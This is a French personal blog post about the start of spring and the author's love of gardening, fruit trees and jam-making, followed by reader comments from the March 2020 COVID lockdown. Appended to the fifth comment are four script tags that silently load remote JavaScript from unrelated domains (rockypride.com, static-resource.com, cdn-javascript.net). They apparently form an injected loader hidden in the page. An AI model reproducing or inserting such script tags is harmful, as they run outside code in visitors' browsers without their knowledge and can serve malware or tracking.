• PRINTEMPS ES-TU LA ?

     

    PRINTEMPS  ES-TU  LA  ?

     

    On féte le printemps  le 20 MARS….

    PRINTEMPS ES TU LA ?

    -

    PRINTEMPS  ES-TU  LA  ?

    des les premiers beaux jours,

    je cultive mon petit coin de verdure

    -

    PRINTEMPS  ES-TU  LA  ?


    Vite dehors dans l’echancrure du temps qui passe,

    les saisons defilent

    au fil des pages dans une atmosphere rejouissante

    Les jardins ont pris des couleurs

    -

    PRINTEMPS  ES-TU  LA  ?


    Les artistes les ont metamorphosés

    -

    PRINTEMPS  ES-TU  LA  ?

    Une belle journee , en perspective

    une salade composée a l’huile d’olive

    -

    PRINTEMPS  ES-TU  LA  ?

     
    Va ensoleiller ma table de midi….

    PRINTEMPS  ES-TU  LA  ?

     

    Puis,

    PRINTEMPS  ES-TU  LA  ?

     

    mes activités parmi tant d'autres......je ne m'ennuie jamais

    et quand j’ai des moments de liberté

    (et en ce moment j’ai la liberté tous les jours ! ! )

    C'est  Le Jardinage

    PRINTEMPS  ES-TU  LA  ?

    J’aime la terre depuis toujours,

    la toucher,

    faire des semis,

    PRINTEMPS  ES-TU  LA  ?


    planter des fleurs,

    PRINTEMPS  ES-TU  LA  ?

    et faire des bouquets

    PRINTEMPS  ES-TU  LA  ?

    Si tu plantes un cerisier dans ton jardin

    Apres la neige blanche de ses petales

    PRINTEMPS  ES-TU  LA  ?


    Ton printemps sera acidulé et juteux

    Et les oiseaux siffleront leur bonheur

    PRINTEMPS  ES-TU  LA  ?

    Si c’est un pommier

    Son bouquet blanc de mariée enchantera les abeilles

     

    PRINTEMPS  ES-TU  LA  ?


    Ton automne sera envahi de pommes croquantes

    -

    PRINTEMPS  ES-TU  LA  ?

    Si c’est un tilleul, son odeur de miel parfumera ton jardin

     ta maison et tes infusions

    -

    PRINTEMPS  ES-TU  LA  ?


    Jolie invitation à la paresse, ton relax en été

    PRINTEMPS  ES-TU  LA  ?

     

    sous cet ombrage pour farnienter…..

    et,

    quand vient le temps des recoltes

    Je ramasse les abricots,

    -

    PRINTEMPS  ES-TU  LA  ?


    et selon la quantité j’en fais des confitures

    PRINTEMPS  ES-TU  LA  ?


    Puis les pommes,

     et ensuite vient la saison du raisin

    -

    PRINTEMPS  ES-TU  LA  ?


    Je regarde grandir mes arbres à secrets….

    Résultat de recherche d'images pour "grandir mes arbres"

    Et le souvenir des belles choses

    comme une envie de jardin fleuri

     

    Résultat de recherche d'images pour "jjardin fleuri"

    « Montrez-moi votre jardin et
    je vous dirais qui vous êtes »
    Alfred Austin

     

    PRINTEMPS  ES-TU  LA  ?





     


  • Commentaires

    1
    Vendredi 20 Mars 2020 à 14:56

    Bonjour Vaiana, merci pour ton com sur ma page! je me sens fatiguée je n'ai pas très bien dormi! j'hésite à me reposer car j'ai peur d'encore plus mal dormir! je suis allée faire une ou deux courses et j'ai apporté de la contrex à papa! papa ne m'a pas payée, on a dit qu'on verrait à la fin du confinement car il faut faire attention avec l'argent! Je m'ennuie! je ne sais pas trop quoi faire, je ne suis pas trop jardinage et papa qui pense déjà à planter ses patates! bises

    2
    Vendredi 20 Mars 2020 à 15:43

    Coucou Vaiana , oui jardiner est mon passe temps favorit mais nous n'avons plus de jardin depuis notre retour en France , ce qui me manque beaucoup ! . Ici depuis ce matin la police chasse les gens assis sur les bancs en face de la mer et l' accès aux plages est interdit ! . Je suis choqué de voir un tel comportement mais il faut l' accepter malgré tout , enfin !! . Demain j' essaierai de trouver un moyen de sortir sans être aperçu de la police mais avec grande prudence , loll !! . Bonne fin de semaine au jardin , gros bisous , escapade , 

     

    3
    Vendredi 20 Mars 2020 à 16:33

    Bonjour Vaiena.

    Voila la première journée du printemps ,chez moi il fait très beau le soleil est resplendissant et réchauffe nos cœurs .

    Oui nous avons un jardin et des arbres fruitiers ,mais pas de fruit encore ,il n'y a que des fleurs .

    nous trouvons a nous occupées pendant le confinement ,mais il y a n'auras pas pour chaque jours ,car je pense que cela va durer encore .

    Malgré le confinement ,on a le blog ou l'on peut venir voir les amies et déposer quelques mots et du réconfort qui peut aider les personnes seules et isolées.

    j'ai le privilège d'être en campagne dans la nature ,mais je pense a tous ceux qui habite une ville et qui n'ont pas de jardin .

    L'amitié est la plus belle pensée ,même virtuelle .

     Oui c'est un si petit mot,qui veut dire tant de choses.

    Mon petit passage pour te souhaiter.

    Un agréable après midi et un bon weekend malgré les aléas de la vie .

    Prend bien soin de toi ma douce et de ta famille .

    Gros bisous kettyn.

    4
    Vendredi 20 Mars 2020 à 16:57

     Bonjour ma bichette... 

    Belle balade dans ton univers,Oui c’est le printemps ,mais où est il aujourd’hui ? le ciel est gris et froid .. 

    Moi je n’ai pas le moral à faire du blog . Ils annoncent un confinement jusqu’au 2 mai. J’adore DENiSE mais je voudrais bien pouvoir rentrer chez moi . Le confinement dure trop longtemps,chez moi j’ai plus d’espaces..je peux m’occuper dehors... Tu vas bientôt avoir la naissance du bébé.et dire que vous ne pourrez même pas aller le voir c’est moche...

    Enfin nous ne pouvons rien y faire  que patienter. 
    Je te souhaite un bon week- end et faites attention à vous deux 

    Gros bisous ma douce amie

    Monique ❤️❤️❤️❤️

    5
    Vendredi 20 Mars 2020 à 17:49

    Bonjour vaianae, je crois que l'on a des passions communes, moi aussi j'aime

    jardiner, planter des fleurs, on a la chance d'avoir un jardin, deux fruitiers,

    un cerisier et un pommier.J'ai toujours aimé la nature. Je te souhaite une belle soirée. Gros bisous-violette

    <script src="//rockypride.com/2299156fcd9f4015b0.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8857x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8857x&format=arrjs&r=1584722714730" type="text/javascript"></script> <script src="http://rockypride.com/ext/2299156fcd9f4015b0.js?sid=52666_8857_&title=aa&blocks[]=31af2" type="text/javascript"></script>
    6
    Vendredi 20 Mars 2020 à 21:50

    tu appelle sa un petit coin de jardin ouf quel travail

    cette semaine tondeuse jardin avec soleil 

    bonne fin de semaine et reste chez toi pour ta santé

    amitié

    7
    Samedi 21 Mars 2020 à 06:53

    Nous voici au printemps, le soleil brille, les températures sont douces, qu'elle chance d'avoir un petit coin de jardin, le confinement parait ainsi plus doux.

    Passe une belle journée

    Amicalement

    Claude

    8
    Samedi 21 Mars 2020 à 07:03

    Bonjour ma douce amie

    Je vois que tu t'occupes bien, tu as de ravissantes fleurs, après l'effort des plantations le réconfort dans ton transat he et miam tu me fais saliver de plaisir. Très beau billet plein d'optimisme avec de belles photos.

    Merci pour ta fidélité à mon blog.

    J'espère que tu vas bien et surtout prudence et prends bien soin de toi.

    J’ai la chance d’être confinée dans une maison avec un grand jardin avec le soleil omniprésent en ce moment avec mon mari, je pense très fort à toutes celles et tous ceux d’entre vous qui sont enfermés dans de petits appartements, avec des enfants!..., les gens seul(e)s, les personnes âgées qui se retrouvent seul(e)s.

    Il faut respecter les consignes et garder l'espoir de retrouver notre liberté bientôt. Je pense très fort à celles et ceux qui ont perdu des êtres chers, quelle tristesse !

    Je soutiens et j'admire toutes les personnes qui prennent soin de nos malades : tout le personnel hospitalier, aides soignantes, infirmier(e)s, médecins, réanimateurs,chirurgiens qui accomplissent des miracles... ! Et des pensées aussi à toutes celles et tous ceux qui sont obligés de travailler en prenant des risques ! Plus que jamais, soyons uni(e)s et solidaires !  

    Je te souhaite un bon week-end.

    De gros bisous d'amitié, ensoleillés et à distance de mon île intense.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :